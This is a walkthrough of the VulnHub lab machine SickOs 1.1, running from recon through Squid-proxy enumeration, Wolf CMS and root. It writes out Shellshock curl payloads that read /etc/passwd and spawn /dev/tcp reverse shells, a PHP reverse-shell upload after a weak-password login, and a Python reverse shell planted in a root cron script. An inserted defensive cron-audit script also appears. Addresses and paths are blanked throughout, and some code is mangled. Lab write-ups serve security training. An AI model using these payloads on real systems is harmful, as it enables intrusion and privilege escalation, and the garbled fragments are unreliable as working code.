[攻略鸭] SickOs 1.1 VulnHub Box Walkthrough
Test machine IP address:
External information gathering
Find the target's address
$ sudo arp-scan -l
Port scan
Nmap results:
22/tcp open ssh syn-ack ttl 64 OpenSSH Debian
/tcp open http-proxy syn-ack ttl 64 Squid http proxy
|_http-server-header: squid/
|_http-title: ERROR: The requested URL could not be retrieved
Squid
msf6 > search squid
msf6 > use auxiliary/scanner/http/squid_pivot_scanning
> set RPORT 3128
> set RHOSTS
> set RANGE
auxiliary(scanner/http/squid_pivot_scanning) > run
[+] [] is alive.
[+] [] seems open (HTTP 200, server header: 'Apache/ (Ubuntu)').
[-] [] unknown Squid proxy error: 'ERR_UNSUP_REQ 0' (HTTP 501)
Configure an HTTP proxy in the browser:
HTTP Proxy 3128
and also proxy localhost and
/
Configure Burp's upstream proxy
/
System-wide export http_proxy="" (partly effective for ffuf, effective for cURL; did not take effect for nmap, nikto or the browser)
Now able to access /
Directory enumeration
ffuf -w /usr/share/wordlists/dirbuster/ -u /FUZZ -e .php,.txt,.html -c -ic -x /
ffuf -w /usr/share/wordlists/dirb/ -u http://localhost/FUZZ -e .php,.txt,.html -c -ic -x
Results:
connect [Status: 200,
index [Status: 200,
[Status: 200,
[Status: 200,
robots [Status: 200,
/cgi-bin/
robots.txt:
: *
Disallow: /
Dissalow: /wolfcms
ffuf -w /usr/share/wordlists/dirb/ -u http://localhost/cgi-bin/FUZZ -e .php,.txt,.html -c -ic -x
status [Status: 200,
Wolf CMS
Visiting /wolfcms/ shows a blog article management system (Posted by Administrator).
$ searchsploit wolfcms
Wolfcms - Cross-Site Request Forgery / Cross-Site Scripting | php/webapps/
 - Cross-Site Request Forgery | php/webapps/
 - Open Redirection | php/webapps/
$ searchsploit wolf
Wolf CMS - Arbitrary File Upload / Execution | php/webapps/
 CMS - Multiple Vulnerabilities | php/webapps/
 CMS - Multiple Vulnerabilities | php/webapps/
 CMS - Arbitrary File Upload | php/webapps/
 CMS - Arbitrary File Upload (Metasploit) | php/remote/
$ searchsploit -m 44421
/wolfcms/?/admin/login
$ searchsploit -m 38000
/wolfcms/?/admin/plugin/file_manager/browse/
Exploitation
1. Shellshock
Verify:
$ curl -H "user-agent: () { : ;};echo;echo;/bin/bash -c 'cat /etc/passwd'" /cgi-bin/status -x
root:x:0:0:root:/root:/bin/bash
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
Get a shell:
nc -nvlp 1233
curl -H "user-agent: () { : ;};echo;echo;/bin/bash -i &>/dev/tcp//1233 <&1" /cgi-bin/status -x
2. Log in to Wolf CMS with a weak password and upload a PHP reverse shell
Log in with the weak credentials admin:admin:
Wolf CMS: Administrator
Username: admin
Upload the PHP reverse shell:
Click the Files tab, create php-reverse-shell under the /wolfcms/public/ directory, and change its permissions to 777.
$ nc -nvlp 1234
$ nc -nvlp 2345
Visit: /wolfcms/public/
$ whoami
www-data
$ bash -c "bash -i >& /dev/tcp//2345 0>&1"
Privilege escalation
$ python -c 'import pty; ("/bin/bash")'
1. Password reuse and sudo escalation
/var/www/wolfcms/:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
Password reuse:
$ su sickos
Password: john@123
sudo escalation:
$ sudo -l
    (ALL : ALL) ALL
sickos@SickOs:~$ sudo su
root@SickOs:~#
2. Cron job running a writable Python file
www-data@SickOs:/var/www$ ls -al
-rwxrwxrwx 1 root root 109 Dec 5 2015
$ cat
#!/usr/bin/python
print "I Try to connect things very frequently\n"
print "You may want to try my services"
$ ls -alhR /etc/cron*
/etc/:
-rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
-rw-r--r-- 1 root root 52 Dec 5 2015 automate
-rw-r--r-- 1 root root 544 Jul 2 2015 php5
$ cat /etc//automate
* * * * * root /usr/bin/python /var/www/
Change its contents to:
#!/usr/bin/python
import socket,subprocess,os
s=(_INET,_STREAM)
(("",1222))
((),0)
((),1)
((),2)
p=(["/bin/sh","-i"])
# id
uid=0(root) gid=0(root) groups=0(root)
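As an added defensive check (not part of the original walkthrough), the following Python script audits system-crontab style entries like the /etc/cron.d line above and flags any referenced script that someone other than its owner can modify. The cron line, the file name job.py and the temporary directory are constructed for the demonstration.

```python
import os
import re
import stat
import tempfile

# System crontab and /etc/cron.d format: five time fields, a user, then the command.
CRON_LINE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<command>.+)$")


def writable_by_non_owner(path):
    """True when the group or 'other' write bit is set on path."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron_text(cron_text):
    """Return (user, path, octal mode) for every absolute file path in a cron
    command that exists and can be modified by someone other than its owner.
    A root job that executes such a file hands root to whoever can write it."""
    findings = []
    for raw in cron_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # comments and VAR=value settings carry no command
        match = CRON_LINE.match(line)
        if not match:
            continue
        for token in match.group("command").split():
            if token.startswith("/") and os.path.isfile(token) and writable_by_non_owner(token):
                mode = format(os.stat(token).st_mode & 0o777, "o")
                findings.append((match.group("user"), token, mode))
    return findings


def demo():
    """Constructed reproduction of the misconfiguration: a root cron job that
    runs a world-writable script (the name job.py and the directory are constructed)."""
    workdir = tempfile.mkdtemp()
    script = os.path.join(workdir, "job.py")
    with open(script, "w") as fh:
        fh.write("#!/usr/bin/python\nprint('placeholder')\n")
    os.chmod(script, 0o777)  # the -rwxrwxrwx mode seen in the ls -al output
    cron_text = "# m h dom mon dow user command\n* * * * * root /usr/bin/python %s\n" % script
    return audit_cron_text(cron_text)


if __name__ == "__main__":
    for user, path, mode in demo():
        print("cron job for %s runs %s, which has mode %s" % (user, path, mode))
```

Running it on a real host means feeding /etc/crontab and each file under /etc/cron.d to audit_cron_text; the fix for any finding is to make the script root-owned and mode 755 or tighter.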
Other
Flag
# cat a*
If you are viewing this!!ROOT!You have Succesfully completed for Trying
Questions and help wanted
I do not fully understand the proxy configuration; could someone explain how to configure a proxychains proxy for this box?